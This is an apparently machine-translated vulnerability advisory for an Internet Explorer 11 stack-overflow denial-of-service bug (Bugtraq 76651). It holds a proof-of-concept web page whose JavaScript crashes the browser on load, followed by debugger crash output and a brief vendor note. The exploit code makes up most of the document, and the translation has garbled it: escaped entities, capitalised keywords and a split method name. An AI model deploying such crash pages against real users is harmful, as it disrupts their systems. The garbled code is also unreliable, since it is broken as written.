Microsoft Internet Explorer 11 Stack Overflow Denial of Service Vulnerability
Microsoft Internet Explorer 11 Stack Overflow Denial of Service Vulnerability
Release date:
Updated on:
Affected Systems:
Microsoft Internet Explorer 11
Description:
Bugtraq id: 76651
Internet Explorer is a Web browser launched by Microsoft.
Microsoft Internet Explorer 11 has a remote denial of service vulnerability. Attackers can exploit this vulnerability to cause the affected applications to crash.
<* Source: Mjx
*>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
<! --
# Exploit title: Microsoft Internet Explorer 11 Stack Underflow Crash PoC
# Date: 09.11.2015
# Vulnerable version: 11 (32bit version) (newest at the time 11.0.9600.17843 and 11.0.10240.16431)
# Tested on: Windows 7 64bit and Windows 10 (10240) 64bit
# Author: Mjx
# Http: // http://jinxin.pen.io/
-->
& Lt ;! Doctype html & gt;
& Lt; html & gt;
& Lt; head & gt;
& Lt; meta http-equiv = & #39; Cache-Control & #39; content = & #39; no-cache & #39;/& gt;
& Lt; title & gt; crash IE 11 & lt;/title & gt;
& Lt; style & gt; & lt;/style & gt;
& Lt; script type = & #39; text/javascript & #39; & gt; & lt;/script & gt;
& Lt; script & gt;
Function crash ()
{
Var id_0 = null;
Id_0 = document. createElement (& #39; THEAD & #39 ;);
Document. body. appendChild (id_0 );
ElemTree = [];
ElemTree [0] = document. createElement (& #39; SELECT & #39 ;);
Document. all [7]. appendChild (elemTree [0]);
ElemTree [1] = document. createElement (& #39; B & #39 ;);
Document. all [8]. appendChild (elemTree [1]);
ElemTree [2] = document. createElement (& #39; SOURCE & #39 ;);
Document. all [0]. appendChild (elemTree [2]);
ElemTree [3] = document. createElement (& #39; HR & #39 ;);
Document. all [8]. appendChild (elemTree [3]);
ElemTree [3]. setAttribute (& #39; hidden & #39;,-4400000000 );
ElemTree [4] = document. createElement (& #39; SELECT & #39 ;);
Document. all [9]. appendChild (elemTree [4]);
ElemTree [5] = document. createElement (& #39; RUBY & #39 ;);
Document. all [2]. appendChild (elemTree [5]);
ElemTree [6] = document. createElement (& #39; OL & #39 ;);
Document. all [4]. appendChild (elemTree [6]);
ElemTree [7] = document. createElement (& #39; AREA & #39 ;);
Document. all [6]. appendChild (elemTree [7]);
ElemTree [8] = document. createElement (& #39; ARTICLE & #39 ;);
Document. all [3]. appendChild (elemTree [8]);
ElemTree [9] = document. createElement (& #39; TEXTAREA & #39 ;);
Document. all [1]. appendChild (elemTree [9]);
TxtRange = document. body. createTextRange ();
TxtRange. moveEnd (& #39; character & #39;, 14 );
TxtRange. select ();
TxtRange.exe cCommand (& #39; insertUnorderedList & #39;, true, null );
TxtRange = document. body. createTextRange ();
TxtRange. moveEnd (& #39; sentence & #39;, 4 );
TxtRange. select ();
TxtRange.exe cCommand (& #39; insertOrderedList & #39;, true, null );
}
& Lt;/script & gt;
& Lt;/head & gt;
& Lt; body onload = & #39; crash (); & #39; & gt;
& Lt;/body & gt;
& Lt;/html & gt;
& Lt ;! --
(1428.1230): Stack overflow-code c00000fd (!!! Second chance !!!)
Eax = 00000004 ebx = 000f0000 ecx = 09ab319c edx = 00000004 esi = 47ce6fd8 edi = 00000000
Eip = 5fd166d9 esp = 09ab3000 ebp = 09ab3004 iopl = 0 nv up ei pl nz na po nc
Cs = 0023 ss = 002b ds = 002b es = 002b fs = 0053 gs = 002b efl = 00010202
Verifier! AVrfpDphAllocateVm + 0x9:
5fd166d9 50 push eax
0: 008 & gt; kb
ChildEBP RetAddr Args to Child
09ab3004 5fd16800 09ab319c 09ab31a0 00001000 verifier! AVrfpDphAllocateVm + 0x9
09ab3184 5fd16a8d 09ab319c 09ab31a0 00000004 verifier! DphCommitMemoryForPageHeap + 0xf0
09ab31ac 5fd18e5d 000f1000 47de0068 00000000 verifier! AVrfpDphSetProtectionsBeforeUse + 0x8d
09ab31dc 77cf0d96 000f0000 01000002 00000028 verifier! AVrfDebugPageHeapAllocate + 0x1fd
0: 008 & gt; r
Eax = 00000004 ebx = 000f0000 ecx = 09ab319c edx = 00000004 esi = 47ce6fd8 edi = 00000000
Eip = 5fd166d9 esp = 09ab3000 ebp = 09ab3004 iopl = 0 nv up ei pl nz na po nc
Cs = 0023 ss = 002b ds = 002b es = 002b fs = 0053 gs = 002b efl = 00010202
Verifier! AVrfpDphAllocateVm + 0x9:
5fd166d9 50 push eax
0: 008 & gt ;! Vprot esp-4
BaseAddress: 09ab2000
AllocationBase: 09ab0000
AllocationProtect: 00000004 PAGE_READWRITE
RegionSize: 001fe000
Status: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
-Type: 00020000 MEM_PRIVATE
-->
Suggestion:
Vendor patch:
Microsoft
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.microsoft.com/windows/ie/default.asp
This article permanently updates the link address: